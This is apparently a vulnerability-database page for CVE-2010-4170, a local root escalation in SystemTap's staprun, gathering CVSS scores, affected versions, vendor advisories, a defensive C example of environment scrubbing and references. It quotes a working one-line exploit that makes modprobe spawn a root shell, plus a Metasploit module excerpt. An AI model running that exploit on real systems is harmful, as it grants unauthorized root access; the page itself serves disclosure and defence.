CVE-2010-4170
Published 2010-12-07
Priority: P339 · high · 7.2 (CVSS 2.0)
Vector: AV:L / AC:L / Au:N / C:C / I:C / A:C
EXPLOIT
EPSS: 4.80% (90.8th percentile)
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | systemtap | < systemtap 1.2-3 (bookworm) | systemtap 1.2-3 (bookworm) |
| systemtap | systemtap | — | — |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
| systemtap | systemtap | >= 0 < 1.2-3 | 1.2-3 |
CVSS provenance
- nvd: v2.0 7.2 HIGH (AV:L/AC:L/Au:N/C:C/I:C/A:C)
- osv: 7.2 HIGH
- vendor_debian: 7.2 HIGH
- vendor_redhat: 7.2 HIGH
GHSA
GHSA-j34m-wwxr-2pj4 (ghsa_unreviewed · 2022-05-14) [HIGH]
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
OSV
CVE-2010-4170 (osv · 2010-12-07 · CVSS 7.2) [HIGH]
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Red Hat
Systemtap: Insecure loading of modules (vendor_redhat · 2010-11-17 · CVSS 7.2) [HIGH] CWE-284
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Debian
systemtap (vendor_debian · 2010 · CVSS 7.2) [HIGH]
The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.
Scope: local
- bookworm: resolved (fixed in 1.2-3)
- bullseye: resolved (fixed in 1.2-3)
- forky: resolved (fixed in 1.2-3)
- sid: resolved (fixed in 1.2-3)
- trixie: resolved (fixed in 1.2-3)
No detection rules found.
Exploit-DB
SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit) (exploitdb · 2019-04-19)
---
The module header is excerpted from the Metasploit source; the class declaration and `update_info` call that extraction collapsed around the module name have been restored, and the excerpt is cut off where the page's copy ends.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
      'Description' => %q{
        This module attempts to gain root privileges by exploiting a
        vulnerability in the `staprun` executable included with SystemTap
        version 1.3.

        The `staprun` executable does not clear environment variables prior to
        executing `modprobe`, allowing an arbitrary configuration file to be
        specified in the `MODPROBE_OPTIONS` environment variable, resulting
        in arbitrary command execution with root privileges.

        This module has been tested successfully on:
        systemtap 1.2-1.fc13-i686 on Fedora 13 (i686
```
Exploit-DB
SystemTap - Local Privilege Escalation (exploitdb · 2010-11-26 · CVSS 7.2) [HIGH]
---
CVE-2010-4170

```sh
# modprobe's "install <module> <command>" directive runs <command> instead of
# loading the module.  staprun (setuid root) execs modprobe for the uprobes
# module without scrubbing its environment, so the inherited MODPROBE_OPTIONS
# adds "-C exploit.conf" and modprobe runs /bin/sh as root.
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
```

RHEL Advisory: https://rhn.redhat.com/errata/RHSA-2010-0894.html
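The one-liner works because a setuid-root staprun hands its caller's environment, MODPROBE_OPTIONS included, straight to modprobe, and modprobe reads extra command-line options (such as `-C <config>`) from that variable. The C program below is an added illustration of the hardening a privileged helper needs before execing modprobe; it was written for this page and is not SystemTap's own patch (that is the upstream commit linked in the Red Hat bug further down). It builds an allow-listed environment with a pinned PATH and execs modprobe by absolute path with execve(). The allow-list names, the /sbin/modprobe path and the `dirty` sample environment are assumptions for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Allow-list of variables a privileged helper may pass to modprobe
 * (assumed for this example).  MODPROBE_OPTIONS is deliberately absent:
 * modprobe reads extra options, including -C <config>, from it, which is
 * the channel CVE-2010-4170 abused.
 */
static const char *const kInherit[] = { "TERM", "LANG", NULL };

/* Fixed PATH so the child never resolves binaries from a caller-chosen dir. */
static const char kSafePath[] = "PATH=/sbin:/usr/sbin:/bin:/usr/bin";

/* True if `entry` ("NAME=value") defines the variable `name`. */
static int entry_is(const char *entry, const char *name)
{
    size_t n = strlen(name);
    return strncmp(entry, name, n) == 0 && entry[n] == '=';
}

/* Does the NULL-terminated array `env` define variable `name`? */
int env_has(char *const *env, const char *name)
{
    for (; *env; env++)
        if (entry_is(*env, name))
            return 1;
    return 0;
}

/*
 * Build a sanitized environment in `out` (capacity `cap`, including the
 * terminating NULL) from the untrusted `in`.  Entries are copied by
 * pointer, so `in` must outlive `out`.  Returns the number of entries
 * written (excluding the NULL), or -1 if `cap` is too small.
 */
int build_clean_env(char *const *in, char **out, size_t cap)
{
    size_t n = 0;
    if (cap < 2)
        return -1;
    out[n++] = (char *)kSafePath;              /* pinned, never inherited */
    for (const char *const *name = kInherit; *name; name++) {
        for (char *const *e = in; *e; e++) {
            if (entry_is(*e, *name)) {
                if (n + 1 >= cap)              /* leave room for the NULL */
                    return -1;
                out[n++] = *e;
                break;                         /* first definition wins */
            }
        }
    }
    out[n] = NULL;
    return (int)n;
}

/*
 * Exec modprobe with the sanitized environment; returns only on failure.
 * Absolute path plus execve() means neither PATH nor MODPROBE_OPTIONS from
 * the caller can influence what runs or which config modprobe reads.
 */
int exec_modprobe_clean(const char *module, char *const *caller_env)
{
    char *env[32];
    if (build_clean_env(caller_env, env, sizeof env / sizeof env[0]) < 0)
        return -1;
    char *const argv[] = { "modprobe", (char *)module, NULL };
    execve("/sbin/modprobe", argv, env);       /* assumed modprobe location */
    return -1;                                 /* execve failed */
}

extern char **environ;

int main(int argc, char **argv)
{
    /* Constructed sample: a caller-controlled environment carrying the attack. */
    char *dirty[] = {
        "MODPROBE_OPTIONS=-C /tmp/exploit.conf",
        "PATH=/tmp:/bin",
        "TERM=xterm",
        NULL,
    };
    char *clean[32];
    int n = build_clean_env(dirty, clean, 32);
    printf("kept %d entries:\n", n);
    for (int i = 0; i < n; i++)
        printf("  %s\n", clean[i]);
    printf("MODPROBE_OPTIONS survives: %s\n",
           env_has(clean, "MODPROBE_OPTIONS") ? "yes" : "no");

    /* Real use: exec modprobe for argv[1] with this process's environment scrubbed. */
    if (argc > 1)
        return exec_modprobe_clean(argv[1], environ) == 0 ? 0 : 1;
    return 0;
}
```

Run without arguments it only prints the scrubbed environment for the constructed sample; with a module name it execs modprobe, which is where the allow-list matters. Dropping every variable except an allow-list is the robust choice: an explicit deny-list of MODPROBE_OPTIONS alone would miss other variables a future modprobe, or an `install` command in a legitimate config, might consult.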
Metasploit
SystemTap MODPROBE_OPTIONS Privilege Escalation (metasploit)
This module attempts to gain root privileges by exploiting a vulnerability in the `staprun` executable included with SystemTap version 1.3. The `staprun` executable does not clear environment variables prior to executing `modprobe`, allowing an arbitrary configuration file to be specified in the `MODPROBE_OPTIONS` environment variable, resulting in arbitrary command execution with root privileges. This module has been tested successfully on: systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and systemtap 1.1-3.el5 on RHEL 5.5 (x64).
Bugzilla
CVE-2010-4170 CVE-2010-4171 systemtap various flaws [fedora-all] (bugzilla · 2010-11-17 · CVSS 7.2) [HIGH]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=653604
Please note: this issue affects multiple supported
Bugzilla
CVE-2010-4170 Systemtap: Insecure loading of modules (bugzilla · 2010-11-15 · CVSS 7.2) [HIGH]
It was found that systemtap runtime tool (staprun)
did not handle the loading of user specified modules
securely. A local attacker could use this flaw to
escalate their privileges.
References:
[1] http://sources.redhat.com/ml/systemtap/2010-q4/msg00230.html
Upstream changeset:
[2] http://sources.redhat.com/git/gitweb.cgi?p=systemtap.git;a=commit;h=b7565b41228bea196cefa3a7d43ab67f8f9152e2
Acknowledgements:
Red Hat would like to thank Tavis Ormandy for reporting this issue.
Discussion:
This issue affects the versions of the systemtap package, as shipped
with Red Hat Enterprise Linux 4, 5 and 6.
--
This issue affects the versions of the systemtap package, as shipped
with Fedora release of 12 and 13.
---
The CVE identifier of CVE-
References
- http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html
- http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051122.html
- http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051127.html
- http://packetstormsecurity.com/files/152569/SystemTap-1.3-MODPROBE_OPTIONS-Privilege-Escalation.html
- http://secunia.com/advisories/42256
- http://secunia.com/advisories/42263
- http://secunia.com/advisories/42306
- http://secunia.com/advisories/42318
- http://secunia.com/advisories/46920
- http://sources.redhat.com/git/gitweb.cgi?p=systemtap.git%3Ba=commit%3Bh=b7565b41228bea196cefa3a7d43ab67f8f9152e2
- http://sources.redhat.com/ml/systemtap/2010-q4/msg00230.html
- http://www.debian.org/security/2011/dsa-2348
- http://www.exploit-db.com/exploits/15620
- http://www.redhat.com/support/errata/RHSA-2010-0894.html
- http://www.redhat.com/support/errata/RHSA-2010-0895.html
- http://www.securityfocus.com/bid/44914
- http://www.securitytracker.com/id?1024754
- https://exchange.xforce.ibmcloud.com/vulnerabilities/63344
- https://www.exploit-db.com/exploits/46730/